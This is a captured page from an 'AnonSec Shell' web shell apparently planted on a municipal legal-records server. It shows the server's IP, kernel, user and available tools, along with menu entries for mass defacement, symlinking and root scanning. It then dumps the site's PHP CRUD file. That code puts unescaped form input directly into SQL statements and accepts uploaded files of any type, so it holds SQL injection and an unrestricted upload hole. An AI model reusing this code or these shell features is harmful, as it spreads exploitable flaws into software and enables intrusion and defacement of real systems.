AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.138   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/juridico/pacajus/modulos/solicitacao/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/juridico/pacajus/modulos/solicitacao/solicita_crud.php
<?php
    /**
     * Created by PhpStorm.
     * User: RalpAlves
     * Date: 12/04/2016
     * Time: 10:07
     */
    
    ini_set('display_errors', 'off');
    $var = $_GET['var'];
    
    if ($var=='incluir') {
        $setor_solicitante_id = $_POST['setor_solicitante_id'];
        $data_solictacao      = $_POST['data_solictacao'];
        $data_prazo           = $_POST['data_prazo'];
        $pedido               = $_POST['pedido'];
        $usu_id               = $_POST['usu_id'];
        $grava                = $conn->prepare("insert into solicita
                                                                    (setor_solicitante_id, data_solicitacao,
                                                                     pedido, data_prazo, status, usu_id)
                                                                  value
                                                                    ('$setor_solicitante_id','$data_solictacao',
                                                                     '$pedido','$data_prazo','1','$usu_id')");
        try {
            $grava->execute();
            $id = $conn->lastInsertId();
            $a  = new aviso();
            $a->avisoSucesso('?page=solicitacao/solicita_edt&id=' . $id, 'Solictação adicionada com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=solicitacao/solicita', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='editar') {
        $varg                 = $_POST['varg'];
        $id                   = $_POST['solicita_id'];
        $setor_solicitante_id = $_POST['setor_solicitante_id'];
        $data_solictacao      = date("Y-m-d", strtotime(str_replace('/', '-', $_POST['data_solictacao'])));
        $data_prazo           = date("Y-m-d", strtotime(str_replace('/', '-', $_POST['data_prazo'])));
        $pedido               = $_POST['pedido'];
        $usu_id               = $_POST['usu_id'];
        $status               = $_POST['status'];
        try {
            $grava = $conn->prepare("UPDATE solicita SET
                                                  setor_solicitante_id = '$setor_solicitante_id',
                                                  data_solicitacao = '$data_solictacao',
                                                  data_prazo = '$data_prazo',
                                                  pedido = '$pedido',
                                                  status = '$status'
                                                  WHERE solicita_id = $id");
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=solicitacao/solicita_edt&id=' . $id . '&varg=' . $varg, 'Solicitação alterada com sucesso!', 'Edição de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=solicitacao/solicita', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='solicita_arq') {
        $varg      = $_POST['varg'];
        $id        = $_POST['id'];
        $descricao = $_POST['descricao'];
        $status    = $_POST['status'];
        
        try {
            $grava = $conn->prepare("insert into solicita_arq
                                                          (solicita_id,status_id,descricao)
                                                          value
                                                          ('$id','$status','$descricao')");
            $grava->execute();
            $id_ = $conn->lastInsertId();
            //envia o arquivo parecer
            $uploaddir   = 'files/solicita/';
            $arquivo_tmp = $_FILES['caminho']['tmp_name'];
            $nome        = $_FILES['caminho']['name'];
            $extensao    = strrchr($nome, '.');
            $extensao    = strtolower($extensao);
            $extsave     = substr(strtoupper($extensao), 1);
            $nome        = 'solicita-' . $id_ . $extensao;
            $uploadfile  = $uploaddir . basename($nome);
            move_uploaded_file($_FILES['caminho']['tmp_name'], $uploadfile);
            
            $atu = $conn->prepare("update solicita_arq set caminho='$uploaddir$nome',tipo='$extsave' WHERE arquivo_id='$id_'");
            $atu->execute();
            
            $a = new aviso();
            $a->avisoSucesso('?page=solicitacao/solicita_edt&id=' . $id . '&varg=' . $varg, 'Registro gravado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=solicitacao/solicita', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='setor_solictante') {
        $setor = $_POST['setor'];
        $grava = $conn->prepare("insert into setor_solicitante (setor) value  ('$setor')");
        try {
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=parecer/auxiliar', 'Registro adicionado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=parecer/auxiliar', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='tipo_procedimento') {
        $tipo_procedimento = $_POST['tipo_procedimento'];
        $grava             = $conn->prepare("insert into tipo_procedimento (tipo_procedimento) value  ('$tipo_procedimento')");
        try {
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=parecer/auxiliar', 'Registro adicionado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=parecer/auxiliar', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='fase') {
        $fase  = $_POST['fase'];
        $grava = $conn->prepare("insert into fases (fase) value  ('$fase')");
        try {
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=parecer/auxiliar', 'Registro adicionado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=parecer/auxiliar', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='tema') {
        $tema  = $_POST['tema'];
        $grava = $conn->prepare("insert into temas (tema) value  ('$tema')");
        try {
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=parecer/auxiliar', 'Registro adicionado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=parecer/auxiliar', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='area') {
        $area  = $_POST['area'];
        $grava = $conn->prepare("insert into areas (area) value  ('$area')");
        try {
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=parecer/auxiliar', 'Registro adicionado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=parecer/auxiliar', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    
    if ($var=='contratado') {
        $fornecedor = $_POST['fornecedor'];
        $grava      = $conn->prepare("insert into fornecedores (fornecedor) value  ('$fornecedor')");
        try {
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=parecer/auxiliar', 'Registro adicionado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=parecer/auxiliar', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    if ($var=='status_arq') {
        $status = $_POST['status'];
        $grava  = $conn->prepare("insert into parecer_arq_status (status) value  ('$status')");
        try {
            $grava->execute();
            $a = new aviso();
            $a->avisoSucesso('?page=parecer/auxiliar', 'Registro adicionado com sucesso!', 'Inclusão de registro');
        } catch (PDOException $e) {
            $a = new aviso();
            $a->avisoErro('?page=parecer/auxiliar', '<strong>' . $e->getMessage() . '</strong >', 'Problema no registro');
        }
    }
    

Anon7 - 2022
AnonSec Team